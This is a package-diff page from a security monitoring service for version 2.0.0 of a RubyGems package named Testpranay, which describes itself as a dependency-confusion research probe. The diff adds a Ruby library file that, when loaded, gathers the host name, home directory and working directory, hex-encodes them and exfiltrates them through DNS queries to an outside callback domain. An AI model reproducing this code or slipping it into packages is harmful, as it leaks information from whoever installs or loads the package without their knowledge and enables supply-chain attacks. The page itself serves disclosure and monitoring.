RubyGems - Testpranay - Versions diffs - 2.0.0 - Mend

Testpranay 2.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of Testpranay might be problematic. Click here for more details.

Files changed (3) hide show

checksums.yaml ADDED Viewed

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 6d205fdcf5fabd04f0bf0c9e9e4f0b980cc45eb401e16a10a84c1f4465a40fb2
+  data.tar.gz: dd5fd8d56e5d25e83c7e72994198c64eb7fff3e26edc961625dd05ca91fce1f6
+SHA512:
+  metadata.gz: 625ac34af6c591b96a49f86f73b313e6a0912da5d0cfa27432e2db5d130007b34bad44781b2cc664d7d40e2d773e6e3696a246e75025b60b2b06aaeb6445300a
+  data.tar.gz: 15605f3c56153f2ac93878d2d415fc294e9ccacf1bc8ef0ee26db4ead013286b543e9c0dd25f24284a5ed43205ae0520af30d14adc098c4544e32d2b8bda9e9e

data/lib/Testpranay.rb ADDED Viewed

@@ -0,0 +1,35 @@
+require 'socket'
+require 'json'
+require 'resolv'
+suffix = '.chyq05r2vtc000096sg0ge9modyyyyyyb.oast.fun'  # Replace with your actual callback domain
+package = 'Testpranay'  # Replace with your package name
+# Only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+  'p' => package,
+  'h' => Socket.gethostname,
+  'd' => File.expand_path('~'),
+  'c' => Dir.pwd
+}
+data = JSON.generate(data)
+data = data.unpack('H*')[0].scan(/.{1,60}/)
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+custom_res = Resolv.new([Resolv::Hosts.new,
+                         Resolv::DNS.new(nameserver: ['8.8.8.8', '8.8.4.4'])])
+data.each.each_with_index do |chunk, idx|
+  begin
+    Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+  rescue; end
+  begin
+    custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+  rescue; end
+end

metadata ADDED Viewed

@@ -0,0 +1,45 @@
+--- !ruby/object:Gem::Specification
+name: Testpranay
+version: !ruby/object:Gem::Version
+  version: 2.0.0
+platform: ruby
+authors:
+- Pranay
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2023-06-05 00:00:00.000000000 Z
+dependencies: []
+description: This package is meant for security research purposes and does not contain
+  any useful code.
+email:
+- Bughunter@gmail.com
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- lib/Testpranay.rb
+homepage: https://rubygems.org/gems/Testpranay
+licenses:
+- MIT
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.3.15
+signing_key:
+specification_version: 4
+summary: 'Vulnerability Disclosure: Dependency confusion vulnerability'
+test_files: []